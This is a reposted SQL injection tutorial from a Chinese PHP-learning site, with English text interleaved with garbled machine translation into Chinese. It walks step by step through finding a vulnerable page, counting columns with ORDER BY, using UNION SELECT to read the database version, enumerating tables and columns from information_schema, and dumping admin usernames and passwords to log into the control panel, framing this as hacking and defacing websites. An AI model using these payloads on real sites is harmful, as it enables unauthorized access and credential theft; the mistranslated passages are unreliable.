来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] SQLI(又名SQL注入或结构化查询语言注射液)利用或黑客网站和污损他们显然是在入门的第一步。It is easily done and it is a great starting off point.Sqli is just basically injecting queri......
SQLI(又名SQL注入或结构化查询语言注射液)利用或黑客网站和污损他们显然是在入门的第一步。It is easily done and it is a great starting off point.Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.这是很容易做到,这是一个伟大的的关闭point.Sqli只是基本上注射到数据库中查询,或使用查询来获得管理员授权旁路开始。
How is it done: www.2cto.com 它是如何做到的 :
First, you need to find an sqli vulnerabel site for example:首先,你需要找到SQLI vulnerabel站点例如: http://www.2cto.com /index.php?id=3
To check that it is vulnerable all you have to do is put a ' at the end of the url.要检查它是脆弱的,所有你所要做的的是在URL的末尾的“。So now your url should look like this:所以,现在您的网址应该是这样的: http://www.2cto.com /index.php?id=3'
Press enter and you get some kind of error.按回车键,你会得到某种错误。The errors will vary but it should look something like this错误会有所不同,但它应该是这个样子 http://i982.photobucket.com/albums/ae308/blink1337/1.pnghttp://i982.photobucket.com/albums/ae308/blink1337/1.png or it would display like this: mysql error syntax.....否则会显示这样的:MySQL错误的语法... ...
If an error happends that site is vulerable!如果一个错误happends的,该网站是vulerable!Now we can start or proper injection...hehehhe.LOL现在我们可以开始或适当注射... hehehhe.LOL
Getting Number of Columns获取列数
After finding your vulnerable site the first step you need to take is to find the number of columns.在找到你的脆弱网站,你需要采取的第一步是找到的列数。The easiest way to do this is use the statement "order by".要做到这一点最简单的方法是,使用的声明“为了”。All you have to do is put ORDER BY (number)所有你所要做的的是把订单(数量) at the end of your url.在您的网址。So it should look like this:因此,它应该看起来像这样:
http://www.2cto.com /index.php?id=3 order by 1
You should start with order by 1 and keep increasing the number by 1 until you get an error. 1,你应该开始不断增加的数字1,直到你得到一个错误。
It should look like this:它应该看起来像这样: http://www.2cto.com /index.php?id=3 order by 1 http://www.2cto.com /index.php?id=3order by 2 http://www.2cto.com /index.php?id=3order by 3 http://www.2cto.com /index.php?id=3order by 4 http://www.2cto.com /index.php?id=3order by 5 http://www.2cto.com /index.php?id=3order by 6
If you get an error at the 7th order, then there are only 6 columns for you to insert for the command如果你在第七的顺序错误,那么对你只有6列插入命令
union select all UNION SELECT所有
. 。
Finding Acsessable Columns寻找Acsessable列
Now that we have the number of columns we need to get the column numbers that we can grab information from.We do this by by using the "Union" "select" and Number of columns.现在,我们有我们需要得到的列数,我们可以抓住信息from.We使用的“联盟”的“选择”和列数由数列。You put them together in your url like this: (Put "-" after the string "=")你把它们一起在您的网址是这样的:(把“- ”后的字符串“=”)
http://www.2cto.com /index.php?id=-3 union select 1,2,3,4,5,6
After you do that you should get something like this...当你做,你应该得到这样的... http://i982.photobucket.com/albums/ae308/blink1337/3.pnghttp://i982.photobucket.com/albums/ae308/blink1337/3.png The page should look a bit messed up and there should be 2 numbers or more on the page(That depend actually).该页面应该看起来有点搞砸了,应该有2号码或更多的页面上(取决于实际的)。These numbers are the column numbers we can get information from.这些数字是列的数字,我们可以得到信息,从。We will replace them with statements later on so write them down or remember them.我们将取代报表以后就这么写下来或记住他们。
Finding MySQL Database Version查找MySQL数据库版本 Put @@version on the desired numbers for example you choose no.将所需的数字,例如你选择没有@ @ VERSION。1 1
http://www.2cto.com /index.php?id=-3 union select @@version,2,3,4,5,6
Press enter and now the page should display the database number.按enter,现在页面显示数据库数量。 http://i982.photobucket.com/albums/ae308/blink1337/4.pnghttp://i982.photobucket.com/albums/ae308/blink1337/4.png Now the number that we had in the first step will be replaced with the database number.现在,我们在第一步的数量将被替换的数据库数量。As it shows above.由于它显示以上。The site that I am testing has a version number of 5.0.45.我测试的网站,有一个版本号为5.0.45。Since this number is 5 or above we will continue working on this site.由于这个数字是5或以上,我们将继续在本网站工作。
Finding the Tables查找表 Next we are going to inject the website to find the table names.下一步,我们要注入的网站上找到的资料表名称。We do this by replacing @@version with "group_concat(table_name)" and also add "+from+information_schema.tables+where+table_schema=database()--" after the last number in our url.我们做“GROUP_CONCAT(TABLE_NAME)”,并添加“+ + information_schema.tables +中+ TABLE_SCHEMA数据库()--"后,在我们的URL的最后一个数字来代替@ @ VERSION。
http://www.2cto.com /index.php?id=-3 union select all group_concat(table_name),2,3,4,5,6+from information_schema.tables+where+ table_schema=database()--
The page should now show the Table names.现在,这个页面应该显示的表名。You may want to write them down.您可能需要把它们写下来。 http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.pnghttp://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png Finding Column Names寻找列名
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns这也正是想获取表名,你只需要改变TABLE_NAME column_name中和information_schema.tables information_schema.columns So your url should look like.所以您的网址应该的样子。
http://www.2cto.com /index.php?id=-3 union select all group_concat(column_name),2,3,4,5,6+from information_schema.columns+where+ table_schema=database()--
Now, the page should display the following column names; password, username, email, name, id, date created, last login, etc. ( Once again it depends)现在,页面应该显示下面的列名,密码,用户名,电子邮件,姓名,ID,创建日期,最后登录等(再次,它取决于)
Getting Information获取信息
Now that we have the database name, table names, and column names we can put them together and pull information from them.现在,我们有数据库名,表名和列名,我们可以把它们放在一起,拉从他们的信息。To do to this we need to put the following in our url.要做到这个,我们需要把我们的网址以下。
The column names should be inserted in the group_concat() section and table_name should be inserted after the from, therefore you should omit the +from+information_schema.columns+where+table_schema=database()-- just like this:列名应插入GROUP_CONCAT()第TABLE_NAME应该是从后插入,因此,你应该从以下省略+ + information_schema.columns + + TABLE_SCHEMA =数据库()- 就像这样:
This is the last part of the code:这是代码的最后一部分:
http://www.2cto.com /index.php?id=-3 union select group_concat(username,0x3a,password),2,3,4,5,6+from+admin
(NOte: 0x3a is used as a separator) (注意:0x3a是作为分隔) Then poof you just got the login name and the password...All you need to do is to find the admin cpanel and login the required information.然后噗,你只是得到了登录名和密码... ...所有你需要做的的是找到管理员的cPanel和登录所需的信息。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com